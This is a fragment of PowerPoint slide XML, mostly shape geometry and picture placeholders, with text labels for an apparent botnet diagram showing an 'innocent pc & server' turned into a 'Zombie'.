            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="70"/>
              <a:ext cx="76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rgbClr val="0033CC"/>
                </a:buClr>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>‘</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Zombie</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184371" name="Picture 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96726342-E070-4E52-A2A7-41D36AA3E54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777" y="830"/>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2" name="Picture 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECA2D72-EB1B-45E4-9C33-3E546E5C4455}"/>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9" y="830"/>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3" name="Picture 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E91CE60-8CD2-4F7F-A097-2C6D63E68F39}"/>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777" y="624"/>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4" name="Picture 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A6B466E-5CC8-4C58-9DD7-E7E2D5F11A0B}"/>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9" y="624"/>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5" name="Picture 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B93E2D8-55C8-4568-9C1B-2F5A983E95D8}"/>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64" y="378"/>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6" name="Picture 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB4052C-76D3-46C8-A416-549FA244F825}"/>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456" y="378"/>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7" name="Picture 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C54BA01E-AA51-42ED-A83C-C41C3B95CAEF}"/>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64" y="172"/>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8" name="Picture 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE56285-55B5-49BB-A6FB-A8DD2AA298B3}"/>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456" y="172"/>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9" name="Picture 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4AF3E4-583F-47BB-BC75-B801DB690F7C}"/>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4" y="474"/>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0" name="Picture 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F0DA16A-EAFC-423D-9A67-E00A72EAB410}"/>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16" y="474"/>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1" name="Picture 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E965F48-299F-4DE8-9C32-4DEA154CBDF4}"/>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24" y="268"/>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2" name="Picture 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8692887-78AA-462F-BBDF-7B29D12A1AD0}"/>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16" y="268"/>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3" name="Picture 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15343DD7-D520-42DC-AB6B-E28168889344}"/>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185" y="206"/>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4" name="Picture 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ACD06F3-85BF-448E-97B4-59C2BB2D9847}"/>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77" y="206"/>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5" name="Picture 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9589EE9E-AF60-4A23-8DDF-50A748CD9ABD}"/>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185" y="0"/>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6" name="Picture 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1A8C2D-A192-463A-AEB8-F478C0B22582}"/>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377" y="0"/>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7" name="Picture 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3351B8-E1EE-4A46-8FCD-D7CD9C7BCC27}"/>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80" y="3196"/>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8" name="Picture 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55DA94EC-3492-4BE3-9E39-7777EC691CAF}"/>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2" y="3196"/>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9" name="Picture 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F66CB4E-DE7A-4D1C-90AA-DFE89BCEB398}"/>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80" y="2990"/>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0" name="Picture 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A655DA-9F83-49B3-88F8-8C84DBF42C6C}"/>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72" y="2990"/>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1" name="Picture 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97974936-E430-4077-9832-9BEB477D4079}"/>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2797"/>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2" name="Picture 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87625F57-D177-43D5-A7A0-283E89404E5C}"/>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2" y="2797"/>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3" name="Picture 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61508F84-45F3-4186-A065-FC8A6D3206A3}"/>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0" y="2591"/>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4" name="Picture 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E343FC16-ACE9-4A95-A076-5C3C9E414223}"/>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2" y="2591"/>
              <a:ext cx="207"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5" name="Text Box 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA7DA97-7D9F-4BDB-A597-0AB640E814C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4080" y="651"/>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400" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Innocent pc &amp; server </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Turn into ‘Zombie’ </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184356" name="Line 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4372FC-1352-486F-BADA-3E28440227DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3884613" y="4826000"/>
            <a:ext cx="193675" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="F7F7F7"/>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4357" name="Group 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5F90FA-EC54-49A8-B628-BEB4157E532A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3832225" y="5287963"/>
            <a:ext cx="434975" cy="701675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="274" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184360" name="Freeform 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51FA30CC-E31C-432A-B386-74F298F019B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="66"/>
              <a:ext cx="188" cy="376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 37 h 376"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 376"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 340 h 376"/>
                <a:gd name="T6" fmla="*/ 188 w 188"/>
                <a:gd name="T7" fmla="*/ 376 h 376"/>
                <a:gd name="T8" fmla="*/ 188 w 188"/>
                <a:gd name="T9" fmla="*/ 37 h 376"/>
                <a:gd name="T10" fmla="*/ 188 w 188"/>
                <a:gd name="T11" fmla="*/ 37 h 376"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 188"/>
                <a:gd name="T19" fmla="*/ 0 h 376"/>
                <a:gd name="T20" fmla="*/ 188 w 188"/>
                <a:gd name="T21" fmla="*/ 376 h 376"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="188" h="376">
                  <a:moveTo>
                    <a:pt x="188" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6366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1" name="Freeform 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D57E1E-3BFA-4ACD-86D8-20744812307A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="188" y="37"/>
              <a:ext cx="86" cy="405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 86"/>
                <a:gd name="T1" fmla="*/ 66 h 405"/>
                <a:gd name="T2" fmla="*/ 86 w 86"/>
                <a:gd name="T3" fmla="*/ 0 h 405"/>
                <a:gd name="T4" fmla="*/ 86 w 86"/>
                <a:gd name="T5" fmla="*/ 340 h 405"/>
                <a:gd name="T6" fmla="*/ 0 w 86"/>
                <a:gd name="T7" fmla="*/ 405 h 405"/>
                <a:gd name="T8" fmla="*/ 0 w 86"/>
                <a:gd name="T9" fmla="*/ 66 h 405"/>
                <a:gd name="T10" fmla="*/ 0 w 86"/>
                <a:gd name="T11" fmla="*/ 66 h 405"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 86"/>
                <a:gd name="T19" fmla="*/ 0 h 405"/>
                <a:gd name="T20" fmla="*/ 86 w 86"/>
                <a:gd name="T21" fmla="*/ 405 h 405"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="86" h="405">
                  <a:moveTo>
                    <a:pt x="0" y="66"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="A8A8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2" name="Freeform 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000F7714-7A19-4B01-999F-53BDE97D3248}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="274" cy="103"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 274"/>
                <a:gd name="T1" fmla="*/ 103 h 103"/>
                <a:gd name="T2" fmla="*/ 0 w 274"/>
                <a:gd name="T3" fmla="*/ 66 h 103"/>
                <a:gd name="T4" fmla="*/ 86 w 274"/>
                <a:gd name="T5" fmla="*/ 0 h 103"/>
                <a:gd name="T6" fmla="*/ 274 w 274"/>
                <a:gd name="T7" fmla="*/ 37 h 103"/>
                <a:gd name="T8" fmla="*/ 188 w 274"/>
                <a:gd name="T9" fmla="*/ 103 h 103"/>
                <a:gd name="T10" fmla="*/ 188 w 274"/>
                <a:gd name="T11" fmla="*/ 103 h 103"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 274"/>
                <a:gd name="T19" fmla="*/ 0 h 103"/>
                <a:gd name="T20" fmla="*/ 274 w 274"/>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74" h="103">
                  <a:moveTo>
                    <a:pt x="188" y="103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="103"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C8C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3" name="Freeform 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{940FF5E5-D9B0-46CF-A4C4-D38B2F6020A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="16" y="86"/>
              <a:ext cx="148" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 148 w 148"/>
                <a:gd name="T1" fmla="*/ 29 h 62"/>
                <a:gd name="T2" fmla="*/ 0 w 148"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 148"/>
                <a:gd name="T5" fmla="*/ 33 h 62"/>
                <a:gd name="T6" fmla="*/ 148 w 148"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 148 w 148"/>
                <a:gd name="T9" fmla="*/ 29 h 62"/>
                <a:gd name="T10" fmla="*/ 148 w 148"/>
                <a:gd name="T11" fmla="*/ 29 h 62"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 148"/>
                <a:gd name="T19" fmla="*/ 0 h 62"/>
                <a:gd name="T20" fmla="*/ 148 w 14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48" h="62">
                  <a:moveTo>
                    <a:pt x="148" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="2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4" name="Freeform 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8729A72-4428-462B-AAED-03994FA7B9D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="49" y="123"/>
              <a:ext cx="192" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 192"/>
                <a:gd name="T1" fmla="*/ 176 h 209"/>
                <a:gd name="T2" fmla="*/ 135 w 192"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 160 w 192"/>
                <a:gd name="T5" fmla="*/ 193 h 209"/>
                <a:gd name="T6" fmla="*/ 160 w 192"/>
                <a:gd name="T7" fmla="*/ 21 h 209"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 0 h 209"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 192"/>
                <a:gd name="T16" fmla="*/ 0 h 209"/>
                <a:gd name="T17" fmla="*/ 192 w 192"/>
                <a:gd name="T18" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="192" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192"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5" name="Freeform 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B93F548-8B94-41BB-8626-2D9C6C77F2DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="233" y="111"/>
              <a:ext cx="29" cy="28"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 12 h 28"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 28"/>
                <a:gd name="T4" fmla="*/ 16 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 28"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 12 h 28"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 24 h 28"/>
                <a:gd name="T12" fmla="*/ 16 w 29"/>
                <a:gd name="T13" fmla="*/ 28 h 28"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 24 h 28"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 12 h 28"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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12"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="24"/>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6" name="Freeform 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D7203DE-EFF2-4F5D-9FB4-E03464D92FA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="237" y="172"/>
              <a:ext cx="29" cy="29"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 17 h 29"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 29"/>
                <a:gd name="T4" fmla="*/ 16 w 29"/>
